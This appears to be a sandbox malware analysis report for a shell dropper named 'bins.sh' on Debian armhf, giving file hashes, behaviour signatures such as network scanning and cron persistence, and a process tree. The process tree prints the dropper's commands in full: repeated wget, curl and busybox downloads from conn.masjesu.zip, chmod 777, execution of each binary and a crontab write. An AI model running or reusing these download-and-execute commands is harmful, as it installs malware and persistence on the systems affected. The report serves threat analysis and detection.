Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    26/11/2024, 18:59

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    b36e5f7a0413ffa61828f903f44a98cd

  • SHA1

    0ca86f60aa4fe5c5e0532a6cd3bd305cb5e43808

  • SHA256

    38995805906e9f6f21572c75e0693f153afbd175ee83c7a53970f66e21f713b4

  • SHA512

    6cd765121418db3017cf4e9ac35f6334b2fc669b53293005a6ee720adbafadab1072473923208647967e21e5ccdd7a8b365df453b05f19c6304ca66a1ca01a48

  • SSDEEP

    96:YDnD7DM1f1ELBC5mBWLKCf39393afjUIExzoTvqm6yN2mQEL7Xs7L7XsG2zQMF3q:t6F04WW0zjEQr9OzsER204t

Malware Config

Signatures

  • Contacts a large (2083) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 5 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 1 IoCs
  • Renames itself 1 IoCs
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 16 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:645
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:647
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb
          2⤵
          • System Network Configuration Discovery
          PID:654
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb
          2⤵
          • Checks CPU configuration
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:659
        • /bin/busybox
          /bin/busybox wget http://conn.masjesu.zip/bins/8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb
          2⤵
          • System Network Configuration Discovery
          PID:677
        • /bin/chmod
          chmod 777 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb
          2⤵
          • File and Directory Permissions Modification
          PID:678
        • /tmp/8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb
          ./8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb
          2⤵
          • Executes dropped EXE
          • Renames itself
          • Reads runtime system information
          PID:679
          • /bin/sh
            sh -c "crontab -l"
            3⤵
              PID:681
              • /usr/bin/crontab
                crontab -l
                4⤵
                  PID:682
              • /bin/sh
                sh -c "crontab -"
                3⤵
                  PID:684
                  • /usr/bin/crontab
                    crontab -
                    4⤵
                    • Creates/modifies Cron job
                    • Reads runtime system information
                    PID:685
              • /bin/rm
                rm 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb
                2⤵
                  PID:687
                • /usr/bin/wget
                  wget http://conn.masjesu.zip/bins/GGcp0PJ0qZvRjEpnxP1NJw0ypACG78sETY
                  2⤵
                  • System Network Configuration Discovery
                  PID:690
                • /usr/bin/curl
                  curl -O http://conn.masjesu.zip/bins/GGcp0PJ0qZvRjEpnxP1NJw0ypACG78sETY
                  2⤵
                  • System Network Configuration Discovery
                  PID:691
                • /bin/busybox
                  /bin/busybox wget http://conn.masjesu.zip/bins/GGcp0PJ0qZvRjEpnxP1NJw0ypACG78sETY
                  2⤵
                  • System Network Configuration Discovery
                  PID:776
                • /bin/chmod
                  chmod 777 GGcp0PJ0qZvRjEpnxP1NJw0ypACG78sETY
                  2⤵
                  • File and Directory Permissions Modification
                  PID:785
                • /tmp/GGcp0PJ0qZvRjEpnxP1NJw0ypACG78sETY
                  ./GGcp0PJ0qZvRjEpnxP1NJw0ypACG78sETY
                  2⤵
                    PID:786
                  • /bin/rm
                    rm GGcp0PJ0qZvRjEpnxP1NJw0ypACG78sETY
                    2⤵
                      PID:787
                    • /usr/bin/wget
                      wget http://conn.masjesu.zip/bins/eKwD5dpTd7Y0aXghuCOXggGp5hirLG3OwQ
                      2⤵
                      • System Network Configuration Discovery
                      PID:788
                    • /usr/bin/curl
                      curl -O http://conn.masjesu.zip/bins/eKwD5dpTd7Y0aXghuCOXggGp5hirLG3OwQ
                      2⤵
                      • System Network Configuration Discovery
                      PID:789
                    • /bin/busybox
                      /bin/busybox wget http://conn.masjesu.zip/bins/eKwD5dpTd7Y0aXghuCOXggGp5hirLG3OwQ
                      2⤵
                      • System Network Configuration Discovery
                      PID:790
                    • /bin/chmod
                      chmod 777 eKwD5dpTd7Y0aXghuCOXggGp5hirLG3OwQ
                      2⤵
                      • File and Directory Permissions Modification
                      PID:791
                    • /tmp/eKwD5dpTd7Y0aXghuCOXggGp5hirLG3OwQ
                      ./eKwD5dpTd7Y0aXghuCOXggGp5hirLG3OwQ
                      2⤵
                        PID:792
                      • /bin/rm
                        rm eKwD5dpTd7Y0aXghuCOXggGp5hirLG3OwQ
                        2⤵
                          PID:793
                        • /usr/bin/wget
                          wget http://conn.masjesu.zip/bins/wzKo9O5QOEysb0D8DnrYo4sj61fpj3MrLo
                          2⤵
                          • System Network Configuration Discovery
                          PID:794
                        • /usr/bin/curl
                          curl -O http://conn.masjesu.zip/bins/wzKo9O5QOEysb0D8DnrYo4sj61fpj3MrLo
                          2⤵
                          • System Network Configuration Discovery
                          PID:795
                        • /bin/busybox
                          /bin/busybox wget http://conn.masjesu.zip/bins/wzKo9O5QOEysb0D8DnrYo4sj61fpj3MrLo
                          2⤵
                          • System Network Configuration Discovery
                          PID:796
                        • /bin/chmod
                          chmod 777 wzKo9O5QOEysb0D8DnrYo4sj61fpj3MrLo
                          2⤵
                          • File and Directory Permissions Modification
                          PID:797
                        • /tmp/wzKo9O5QOEysb0D8DnrYo4sj61fpj3MrLo
                          ./wzKo9O5QOEysb0D8DnrYo4sj61fpj3MrLo
                          2⤵
                            PID:798
                          • /bin/rm
                            rm wzKo9O5QOEysb0D8DnrYo4sj61fpj3MrLo
                            2⤵
                              PID:799
                            • /usr/bin/wget
                              wget http://conn.masjesu.zip/bins/40Nv4EfSYZ90kl24S0WvvlyrGXWtQC2EJf
                              2⤵
                              • System Network Configuration Discovery
                              PID:800
                            • /usr/bin/curl
                              curl -O http://conn.masjesu.zip/bins/40Nv4EfSYZ90kl24S0WvvlyrGXWtQC2EJf
                              2⤵
                              • System Network Configuration Discovery
                              PID:802
                            • /bin/busybox
                              /bin/busybox wget http://conn.masjesu.zip/bins/40Nv4EfSYZ90kl24S0WvvlyrGXWtQC2EJf
                              2⤵
                              • System Network Configuration Discovery
                              PID:808
                            • /bin/chmod
                              chmod 777 40Nv4EfSYZ90kl24S0WvvlyrGXWtQC2EJf
                              2⤵
                              • File and Directory Permissions Modification
                              PID:809
                            • /tmp/40Nv4EfSYZ90kl24S0WvvlyrGXWtQC2EJf
                              ./40Nv4EfSYZ90kl24S0WvvlyrGXWtQC2EJf
                              2⤵
                                PID:811
                              • /bin/rm
                                rm 40Nv4EfSYZ90kl24S0WvvlyrGXWtQC2EJf
                                2⤵
                                  PID:812
                                • /usr/bin/wget
                                  wget http://conn.masjesu.zip/bins/6h6MVlCJshDxmomNotsocz6RjWoYOJBihC
                                  2⤵
                                  • System Network Configuration Discovery
                                  PID:813

                              Network

                              MITRE ATT&CK Enterprise v15

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • /tmp/8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb

                                Filesize

                                177KB

                                MD5

                                786d75a158fe731feca3880f436082c0

                                SHA1

                                79ea2734e43d00cdeabed5586b2c1994d02aef3e

                                SHA256

                                5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18

                                SHA512

                                7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f

                              • /var/spool/cron/crontabs/tmp.raA4QP

                                Filesize

                                210B

                                MD5

                                c4a081a63dcc5ebce2f26b66f0ea672b

                                SHA1

                                c10493b606407890addb547db4a4c1fe1875c59a

                                SHA256

                                be05433ca7dbde044d339a4ed4bbcf187ff527dd8931b236cbf5ed6043754885

                                SHA512

                                4b0ba16ba46f1690b87f279413bbaa71191839c6d866c447c3826c25ee4a9c721499874ffd326133612cb113a3fcd40669256c8d8ad3fb324b383c4a0d9b1076